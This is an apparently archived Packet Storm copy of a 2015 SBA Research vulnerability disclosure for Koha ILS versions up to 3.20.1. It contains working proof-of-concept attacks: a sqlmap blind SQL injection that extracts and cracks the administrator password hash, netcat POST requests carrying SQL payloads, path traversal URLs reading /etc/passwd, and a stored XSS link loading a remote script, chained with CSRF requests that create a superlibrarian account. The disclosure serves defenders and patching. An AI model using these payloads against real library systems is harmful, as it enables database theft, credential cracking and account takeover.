what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection
Posted Jun 26, 2015
Authored by Raschin Tavakoli

Koha ILS suffers from cross site request forgery, cross site scripting, remote SQL injection, and path traversal vulnerabilities. Versions 3.20.x less than or equal to 3.20.1, 3.18.x less than or equal to 3.18.8, and 3.16.x less than or equal to 3.16.12 are affected.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2015-4631, CVE-2015-4632, CVE-2015-4633
SHA-256 | db2ddcd34b4c592559253b1b3c6f3e7e83b307e30c13455c3c11e7c181ea9384

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Change Mirror Download
===============================================================================================
SBA Research Vulnerability Disclosure 
===============================================================================================

title: Koha Unauthenticated SQL injection
product:         Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website:         http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:         cst@sba-research.org


References: http://koha-community.org/security-release-koha-3-20-1/
        http://koha-community.org/security-release-koha-3-18-8/
        http://koha-community.org/security-release-koha-3-16-12/


        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
        ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

=========================
1. Mutiple SQL Injections
=========================

+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

Impact:
-------
By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the webserver is misconfigured, the file-system may be accessed as well.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we we need to execute some SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org


   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


   [*] starting at 09:20:07


   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER


   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left

4. Log in with username "admin" and password "admin" ;)

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's to read arbritrary data via the database due to improper input validation of the parameters Filter and Criteria.

Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002


echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
3. Path Traversal (CVE-2015-4633)
=================================

Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

Impact
------
A remote attacker my read arbitrary files on the system.

References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
4. XSS and XSRF 
=================================

Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site 
forgery (XSRF) attacks. 

The attack can be performed by:

- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected from stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected from relfective XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode",
"suggesteddate_from", "suggesteddate_to")

Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:

- escalate privileges by targeting staff members with XSRF 
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities. 

References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

# ################################################################################################## #
# PoC / Attack Scenario:     #
# ################################################################################################## #

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:
-----------------------

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:
----------------------------------------------------------

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

# ################################################################################################## #
# PoC / Attack Scenario End     #
# ################################################################################################## #







Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close